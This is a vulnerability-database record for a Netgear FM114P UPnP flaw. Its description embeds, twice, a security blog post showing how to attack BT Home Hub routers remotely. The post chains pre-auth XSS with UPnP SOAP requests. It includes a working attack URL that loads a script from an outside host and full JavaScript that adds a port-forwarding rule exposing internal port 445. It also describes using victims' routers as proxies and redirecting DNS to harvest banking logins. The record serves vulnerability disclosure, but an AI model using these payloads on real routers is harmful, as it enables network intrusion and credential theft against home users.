VAR-200304-0138
Vulnerability from variot - Updated: 2022-05-17 22:39Netgear FM114P ProSafe is a wireless network router. The Netgear FM114P ProSafe wireless network router has a vulnerability when using the UPnP feature, which can be exploited by remote attackers to obtain WAN interface username and password information. If the remote access and UPnP functions are enabled on the device, the remote user can verify the username and password information for the Netgear FM114P ProSafe connection, which can be obtained by submitting a UPnP soap request to the WAN interface. http://www.gnucitizen.org/blog/bt-home-flub-pwnin-the-bt-home-hub-5
It's known that UPnP [1] is inherently insecure for a very simple reason: administrative tasks can be performed on a Internet Gateway Device (IGD) without needing to know the admin password whatsoever! This on its own is quite scary and I personally feel that although there is some research in the public domain, there is much more attention that needs to be paid to UPnP.
UPnP allows you to perform administrative functions. Some functions are very standardized and supported by most devices. Examples include obtaining network settings, and enabling port forwarding rules. Other functions are make/model specific. Some very scary functions such as obtaining administrative username and password pairs have been reported [2] in the past. As a reminder, this works without submitting any administrative password whatsoever since UPnP is a authenticationless protocol. On top of this, most IGDs support UPnP by default.
After having read several UPnP security research materials I realized that all the described attacks assume that the attacker (be it human or malware) comes from inside the network. This post describes how to exploit IGDs remotely via UPnP even when no services are publicly available (WAN interface).
** Preauth XSS + SOAP payload = remote UPnP exploitation **
If you sniff yourself while running software that uses UPnP in the background to help you configure your router, you'll see that UPnP is nothing more than SOAP. Our AJAX knowledge tells us about a feature that allows us to craft arbitrary XML requests: the XMLHttpRequest [3] object. Trouble is, such object can only be used within the context of the site that the requests are submitted to. So if we host the malicious scripting code on a third-party site, and a victim user located in the same LAN as the target IGD visits such page, the request wouldn't go through due to XMLHttpRequest same-origin policy restricition. Or put in a different way: you aren't allowed to make XMLHttpRequests to any server except the server where your web page came from.
However, if you find a pre-auth XSS vulnerability [4] on the target device you can bypass such restriction. For instance, many devices such as the BT Home Hub and Speedtouch routers offer certain pages before authenticating. Some of these pages are cgi scripts which are vulnerable to XSS. Although offering certain "useless" functionalities before logging into the router might not seem like a big deal, it can actually lead to UPnP being exploited remotely, even if the web admin console is not visible from the Internet!
The following is a non-malicious proof-of-concept exploit which sets up a port-forwarding rule from port 1337 on the WAN interface to port 445 on the internal IP address 192.168.1.64. Such IP address is the first usable IP address reserved for clients connected to Speedtouch and BT Home Hub routers. The exploit has been tested on BT Home Hub - Firmware version 6.2.6.B. Just to make things clear, UPnP is enabled by default on the BT Home Hub, just like most IGDs. If your Internet gateway is a BT Home Hub, clicking on the following link should add a new forward rule called EVILFORWARDRULE: ATTACK http://192.168.1.254/cgi/b/ic/connect/?url=%22%3e%3cscript%20src='http://www.gnucitizen.org/projects/bt-home-flub-pwnin-the-bt-home-hub-5/payload.xss'%3e%3c/script%3e%3ca%20b=
In order to check if the port-forwarding rule was added successfully you can use UPnP Port Forwarding Utility [5] and simply click on "Update list now" after the device has been discovered (device name should show on the top-left corner a few seconds later after launching the tool). You could of course use the technique and code explained in this post on any Internet gateway that supports UPnP and is a vulnerable to a preauth XSS vulnerability. If you manage to successfully test this attack on the BT Home Hub or any other device please let us know!
** Zombie routers and the unvalidated NewInternalClient bug **
A bit of more UPnP hacking lead me to realize that the BT Home Hub is vulnerable to the (in)famous unvalidated NewInternalClient bug. This bug allows you to choose external IP addresses instead of a LAN IP addresses as intended when setting up port-forwarding rules via UPnP. In this case, I reused the previous code and changed the internal IP address (192.168.1.64) in the NewInternalClient tag with the IP address of a random Internet web server and the value of the NewInternalPort tag to 80. This effectively allows an attacker to use the vulnerable BT Home Hub router as a proxy - aka onion router. In other words, when probing the router's NATed IP address on port 1337, the attacker is effectively probing the IP address and port number specified by the port-forwarding rule - except the routers IP address would be shown in logs of the target web server, as opposed to the attacker's real IP address. I thought this is a nice real example of how a vulnerable router can be used as a zombie by simply having a user visit a page with malicious scripting (XSS + UPnP SOAP request). Imagine running your favourite vulnerability scanner against a target site, while using the victim user's router as a proxy - sweet!
There are other UPnP functionalities besides port forwarding rules that look potentially interesting from a hacking point of view. For instance, SetDNSServer [6] allows you to guess what, set the gateway's DNS server. Imagine someone changing your router's DNS server setting by simply visiting a webpage. After that you visit yourfavoritebank.com and guess what, you're actually visiting a malicious server that is harvesting all your banking login details! I'll leave the exercise of writing a remote UPnP exploit that changes the DNS server setting on the BT Home Hub (or any other vulnerable router) to the reader.
** About GNUCITIZEN **
GNUCITIZEN is a Cutting Edge, Ethical Hacker Outfit, Information Think Tank, which primarily deals with all aspects of the art of hacking. Our work has been featured in established magazines and information portals, such as Wired, Eweek, The Register, PC Week, IDG, BBC and many others. The members of the GNUCITIZEN group are well known and well established experts in the Information Security, Black Public Relations (PR) Industries and Hacker Circles with widely recognized experience in the government and corporate sectors and the open source community.
GNUCITIZEN is an ethical, white-hat organization that doesn't hide anything. We strongly believe that knowledge belongs to everyone and we make everything to ensure that our readers have access to the latest cutting-edge research and get alerted of the newest security threats when they come. Our experience shows that the best way of protection is the mass information. And we mean that literally!!! It is in the public's best interest to make our findings accessible to vast majority of people, simply because it is proven that the more people know about a certain problem, the better.
[1] http://www.upnp.org/resources/whitepapers.asp [2] http://www.securityfocus.com/bid/7267/discuss [3] http://www.w3.org/TR/XMLHttpRequest/ [4] http://www.gnucitizen.org/blog/bt-home-flub-pwnin-the-bt-home-hub-4 [5] http://www.codeproject.com/KB/IP/PortForward.aspx [6] http://www-adele.imag.fr/users/Didier.Donsez/dev/osgi/upnpgendevice/api/fr/imag/adele/bundle/upnp/igd/model/LANHostConfigManagementModel.html#setDNSServer(java.lang.String)
// http://www.gnucitizen.org/projects/bt-home-flub-pwnin-the-bt-home-hub-5/payload.xss var req; var url="/upnp/control/igd/wanpppcInternet";
function loadXMLDoc(url) { req = false; // branch for native XMLHttpRequest object if(window.XMLHttpRequest && !(window.ActiveXObject)) { try { req = new XMLHttpRequest(); } catch(e) { req = false; } // branch for IE/Windows ActiveX version } else if(window.ActiveXObject) { try { req = new ActiveXObject("Msxml2.XMLHTTP"); } catch(e) { try { req = new ActiveXObject("Microsoft.XMLHTTP"); } catch(e) { req = false; } } } if(req) { req.onreadystatechange = processReqChange; req.open("POST", url, true); req.setRequestHeader('SOAPAction', '"urn:schemas-upnp-org:service:WANPPPConnection:1#AddPortMapping"');
req.send('<?xml version="1.0"?><SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">1337TCP445192.168.1.641EVILFORWARDRULE0'); } }
function processReqChange() { // only if req shows "loaded" if (req.readyState == 4) { // only if "OK" if (req.status == 200) { // ...processing statements go here... //alert(req.responseText); } else { alert("There was a problem retrieving the XML data:\n" + req.statusText); } } }
loadXMLDoc(url);
-- pagvac gnucitizen.org, ikwt.com
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200304-0138",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "fwag114 1.0.26rc4",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "fm114p",
"scope": null,
"trust": 0.3,
"vendor": "netgear",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-0958"
},
{
"db": "BID",
"id": "7267"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Discovery is credited to Bj\u00f6rn Stickler \u003cstickler@rbg.informatik.tu-darmstadt.de\u003e.",
"sources": [
{
"db": "BID",
"id": "7267"
}
],
"trust": 0.3
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2003-0958",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2003-0958",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-0958"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear FM114P ProSafe is a wireless network router. The Netgear FM114P ProSafe wireless network router has a vulnerability when using the UPnP feature, which can be exploited by remote attackers to obtain WAN interface username and password information. If the remote access and UPnP functions are enabled on the device, the remote user can verify the username and password information for the Netgear FM114P ProSafe connection, which can be obtained by submitting a UPnP soap request to the WAN interface. http://www.gnucitizen.org/blog/bt-home-flub-pwnin-the-bt-home-hub-5\n\nIt\u0027s known that UPnP [1] is inherently insecure for a very simple\nreason: administrative tasks can be performed on a Internet Gateway\nDevice (IGD) without needing to know the admin password whatsoever!\nThis on its own is quite scary and I personally feel that although\nthere is some research in the public domain, there is much more\nattention that needs to be paid to UPnP. \n\nUPnP allows you to perform administrative functions. Some functions\nare very standardized and supported by most devices. Examples include\nobtaining network settings, and enabling port forwarding rules. Other\nfunctions are make/model specific. Some very scary functions such as\nobtaining administrative username and password pairs have been\nreported [2] in the past. As a reminder, this works without submitting\nany administrative password whatsoever since UPnP is a\nauthenticationless protocol. On top of this, most IGDs support UPnP by\ndefault. \n\nAfter having read several UPnP security research materials I realized\nthat all the described attacks assume that the attacker (be it human\nor malware) comes from inside the network. This post describes how to\nexploit IGDs remotely via UPnP even when no services are publicly\navailable (WAN interface). \n\n\n** Preauth XSS + SOAP payload = remote UPnP exploitation **\n\nIf you sniff yourself while running software that uses UPnP in the\nbackground to help you configure your router, you\u0027ll see that UPnP is\nnothing more than SOAP. Our AJAX knowledge tells us about a feature\nthat allows us to craft arbitrary XML requests: the XMLHttpRequest [3]\nobject. Trouble is, such object can only be used within the context of\nthe site that the requests are submitted to. So if we host the\nmalicious scripting code on a third-party site, and a victim user\nlocated in the same LAN as the target IGD visits such page, the\nrequest wouldn\u0027t go through due to XMLHttpRequest same-origin policy\nrestricition. Or put in a different way: you aren\u0027t allowed to make\nXMLHttpRequests to any server except the server where your web page\ncame from. \n\nHowever, if you find a pre-auth XSS vulnerability [4] on the target\ndevice you can bypass such restriction. For instance, many devices\nsuch as the BT Home Hub and Speedtouch routers offer certain pages\nbefore authenticating. Some of these pages are cgi scripts which are\nvulnerable to XSS. Although offering certain \"useless\" functionalities\nbefore logging into the router might not seem like a big deal, it can\nactually lead to UPnP being exploited remotely, even if the web admin\nconsole is not visible from the Internet!\n\nThe following is a non-malicious proof-of-concept exploit which sets\nup a port-forwarding rule from port 1337 on the WAN interface to port\n445 on the internal IP address 192.168.1.64. Such IP address is the\nfirst usable IP address reserved for clients connected to Speedtouch\nand BT Home Hub routers. The exploit has been tested on BT Home Hub -\nFirmware version 6.2.6.B. Just to make things clear, UPnP is enabled\nby default on the BT Home Hub, just like most IGDs. If your Internet\ngateway is a BT Home Hub, clicking on the following link should add a\nnew forward rule called EVILFORWARDRULE: ATTACK\n\u003chttp://192.168.1.254/cgi/b/ic/connect/?url=%22%3e%3cscript%20src=\u0027http://www.gnucitizen.org/projects/bt-home-flub-pwnin-the-bt-home-hub-5/payload.xss\u0027%3e%3c/script%3e%3ca%20b=\u003e\n\nIn order to check if the port-forwarding rule was added successfully\nyou can use UPnP Port Forwarding Utility [5] and simply click on\n\"Update list now\" after the device has been discovered (device name\nshould show on the top-left corner a few seconds later after launching\nthe tool). You could of course use the technique and code explained in\nthis post on any Internet gateway that supports UPnP and is a\nvulnerable to a preauth XSS vulnerability. If you manage to\nsuccessfully test this attack on the BT Home Hub or any other device\nplease let us know!\n\n\n** Zombie routers and the unvalidated NewInternalClient bug **\n\nA bit of more UPnP hacking lead me to realize that the BT Home Hub is\nvulnerable to the (in)famous unvalidated NewInternalClient bug. This\nbug allows you to choose external IP addresses instead of a LAN IP\naddresses as intended when setting up port-forwarding rules via UPnP. \nIn this case, I reused the previous code and changed the internal IP\naddress (192.168.1.64) in the NewInternalClient tag with the IP\naddress of a random Internet web server and the value of the\nNewInternalPort tag to 80. This effectively allows an attacker to use\nthe vulnerable BT Home Hub router as a proxy - aka onion router. In\nother words, when probing the router\u0027s NATed IP address on port 1337,\nthe attacker is effectively probing the IP address and port number\nspecified by the port-forwarding rule - except the routers IP address\nwould be shown in logs of the target web server, as opposed to the\nattacker\u0027s real IP address. I thought this is a nice real example of\nhow a vulnerable router can be used as a zombie by simply having a\nuser visit a page with malicious scripting (XSS + UPnP SOAP request). \nImagine running your favourite vulnerability scanner against a target\nsite, while using the victim user\u0027s router as a proxy - sweet!\n\nThere are other UPnP functionalities besides port forwarding rules\nthat look potentially interesting from a hacking point of view. For\ninstance, SetDNSServer [6] allows you to guess what, set the gateway\u0027s\nDNS server. Imagine someone changing your router\u0027s DNS server setting\nby simply visiting a webpage. After that you visit\nyourfavoritebank.com and guess what, you\u0027re actually visiting a\nmalicious server that is harvesting all your banking login details!\nI\u0027ll leave the exercise of writing a remote UPnP exploit that changes\nthe DNS server setting on the BT Home Hub (or any other vulnerable\nrouter) to the reader. \n\n\n** About GNUCITIZEN **\n\nGNUCITIZEN is a Cutting Edge, Ethical Hacker Outfit, Information Think\nTank, which primarily deals with all aspects of the art of hacking. \nOur work has been featured in established magazines and information\nportals, such as Wired, Eweek, The Register, PC Week, IDG, BBC and\nmany others. The members of the GNUCITIZEN group are well known and\nwell established experts in the Information Security, Black Public\nRelations (PR) Industries and Hacker Circles with widely recognized\nexperience in the government and corporate sectors and the open source\ncommunity. \n\nGNUCITIZEN is an ethical, white-hat organization that doesn\u0027t hide\nanything. We strongly believe that knowledge belongs to everyone and\nwe make everything to ensure that our readers have access to the\nlatest cutting-edge research and get alerted of the newest security\nthreats when they come. Our experience shows that the best way of\nprotection is the mass information. And we mean that literally!!! It\nis in the public\u0027s best interest to make our findings accessible to\nvast majority of people, simply because it is proven that the more\npeople know about a certain problem, the better. \n\n\n[1] http://www.upnp.org/resources/whitepapers.asp\n[2] http://www.securityfocus.com/bid/7267/discuss\n[3] http://www.w3.org/TR/XMLHttpRequest/\n[4] http://www.gnucitizen.org/blog/bt-home-flub-pwnin-the-bt-home-hub-4\n[5] http://www.codeproject.com/KB/IP/PortForward.aspx\n[6] http://www-adele.imag.fr/users/Didier.Donsez/dev/osgi/upnpgendevice/api/fr/imag/adele/bundle/upnp/igd/model/LANHostConfigManagementModel.html#setDNSServer(java.lang.String)\n\n\n\n// http://www.gnucitizen.org/projects/bt-home-flub-pwnin-the-bt-home-hub-5/payload.xss\nvar req;\nvar url=\"/upnp/control/igd/wanpppcInternet\";\n\nfunction loadXMLDoc(url) {\n\treq = false;\n // branch for native XMLHttpRequest object\n if(window.XMLHttpRequest \u0026\u0026 !(window.ActiveXObject)) {\n \ttry {\n\t\t\treq = new XMLHttpRequest();\n } catch(e) {\n\t\t\treq = false;\n }\n // branch for IE/Windows ActiveX version\n } else if(window.ActiveXObject) {\n \ttry {\n \treq = new ActiveXObject(\"Msxml2.XMLHTTP\");\n \t} catch(e) {\n \ttry {\n \t\treq = new ActiveXObject(\"Microsoft.XMLHTTP\");\n \t} catch(e) {\n \t\treq = false;\n \t}\n\t\t}\n }\n\tif(req) {\n\t\treq.onreadystatechange = processReqChange;\n\t\treq.open(\"POST\", url, true);\n\t\treq.setRequestHeader(\u0027SOAPAction\u0027,\n\u0027\"urn:schemas-upnp-org:service:WANPPPConnection:1#AddPortMapping\"\u0027);\n\n\t\treq.send(\u0027\u003c?xml version=\"1.0\"?\u003e\u003cSOAP-ENV:Envelope\nxmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"\nSOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003cSOAP-ENV:Body\u003e\u003cm:AddPortMapping\nxmlns:m=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"\u003e\u003cNewRemoteHost\nxmlns:dt=\"urn:schemas-microsoft-com:datatypes\"\ndt:dt=\"string\"\u003e\u003c/NewRemoteHost\u003e\u003cNewExternalPort\nxmlns:dt=\"urn:schemas-microsoft-com:datatypes\"\ndt:dt=\"ui2\"\u003e1337\u003c/NewExternalPort\u003e\u003cNewProtocol\nxmlns:dt=\"urn:schemas-microsoft-com:datatypes\"\ndt:dt=\"string\"\u003eTCP\u003c/NewProtocol\u003e\u003cNewInternalPort\nxmlns:dt=\"urn:schemas-microsoft-com:datatypes\"\ndt:dt=\"ui2\"\u003e445\u003c/NewInternalPort\u003e\u003cNewInternalClient\nxmlns:dt=\"urn:schemas-microsoft-com:datatypes\"\ndt:dt=\"string\"\u003e192.168.1.64\u003c/NewInternalClient\u003e\u003cNewEnabled\nxmlns:dt=\"urn:schemas-microsoft-com:datatypes\"\ndt:dt=\"boolean\"\u003e1\u003c/NewEnabled\u003e\u003cNewPortMappingDescription\nxmlns:dt=\"urn:schemas-microsoft-com:datatypes\"\ndt:dt=\"string\"\u003eEVILFORWARDRULE\u003c/NewPortMappingDescription\u003e\u003cNewLeaseDuration\nxmlns:dt=\"urn:schemas-microsoft-com:datatypes\"\ndt:dt=\"ui4\"\u003e0\u003c/NewLeaseDuration\u003e\u003c/m:AddPortMapping\u003e\u003c/SOAP-ENV:Body\u003e\u003c/SOAP-ENV:Envelope\u003e\u0027);\n\t}\n}\n\nfunction processReqChange() {\n // only if req shows \"loaded\"\n if (req.readyState == 4) {\n // only if \"OK\"\n if (req.status == 200) {\n // ...processing statements go here... \n\t\t//alert(req.responseText);\n } else {\n alert(\"There was a problem retrieving the XML data:\\n\" +\nreq.statusText);\n }\n }\n}\n\n\nloadXMLDoc(url);\n\n-- \npagvac\ngnucitizen.org, ikwt.com\n",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-0958"
},
{
"db": "BID",
"id": "7267"
},
{
"db": "PACKETSTORM",
"id": "62502"
}
],
"trust": 0.9
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "7267",
"trust": 1.0
},
{
"db": "CNVD",
"id": "CNVD-2003-0958",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "62502",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-0958"
},
{
"db": "BID",
"id": "7267"
},
{
"db": "PACKETSTORM",
"id": "62502"
}
]
},
"id": "VAR-200304-0138",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-0958"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-0958"
}
]
},
"last_update_date": "2022-05-17T22:39:13.925000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=104940655818917\u0026w=2"
},
{
"trust": 0.3,
"url": "/archive/1/317353"
},
{
"trust": 0.1,
"url": "http://www.w3.org/tr/xmlhttprequest/"
},
{
"trust": 0.1,
"url": "http://www-adele.imag.fr/users/didier.donsez/dev/osgi/upnpgendevice/api/fr/imag/adele/bundle/upnp/igd/model/lanhostconfigmanagementmodel.html#setdnsserver(java.lang.string)"
},
{
"trust": 0.1,
"url": "http://www.gnucitizen.org/projects/bt-home-flub-pwnin-the-bt-home-hub-5/payload.xss"
},
{
"trust": 0.1,
"url": "http://www.upnp.org/resources/whitepapers.asp"
},
{
"trust": 0.1,
"url": "http://www.gnucitizen.org/blog/bt-home-flub-pwnin-the-bt-home-hub-4"
},
{
"trust": 0.1,
"url": "http://192.168.1.254/cgi/b/ic/connect/?url=%22%3e%3cscript%20src=\u0027http://www.gnucitizen.org/projects/bt-home-flub-pwnin-the-bt-home-hub-5/payload.xss\u0027%3e%3c/script%3e%3ca%20b=\u003e"
},
{
"trust": 0.1,
"url": "http://schemas.xmlsoap.org/soap/envelope/\""
},
{
"trust": 0.1,
"url": "http://www.securityfocus.com/bid/7267/discuss"
},
{
"trust": 0.1,
"url": "http://www.gnucitizen.org/blog/bt-home-flub-pwnin-the-bt-home-hub-5"
},
{
"trust": 0.1,
"url": "http://www.codeproject.com/kb/ip/portforward.aspx"
},
{
"trust": 0.1,
"url": "http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003csoap-env:body\u003e\u003cm:addportmapping"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-0958"
},
{
"db": "BID",
"id": "7267"
},
{
"db": "PACKETSTORM",
"id": "62502"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2003-0958"
},
{
"db": "BID",
"id": "7267"
},
{
"db": "PACKETSTORM",
"id": "62502"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2003-04-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2003-0958"
},
{
"date": "2003-04-03T00:00:00",
"db": "BID",
"id": "7267"
},
{
"date": "2008-01-10T22:57:43",
"db": "PACKETSTORM",
"id": "62502"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2003-04-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2003-0958"
},
{
"date": "2003-04-03T00:00:00",
"db": "BID",
"id": "7267"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "7267"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear FM114P ProSafe Wireless Router UPnP Information Disclosure Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-0958"
},
{
"db": "BID",
"id": "7267"
}
],
"trust": 0.9
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Configuration Error",
"sources": [
{
"db": "BID",
"id": "7267"
}
],
"trust": 0.3
}
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.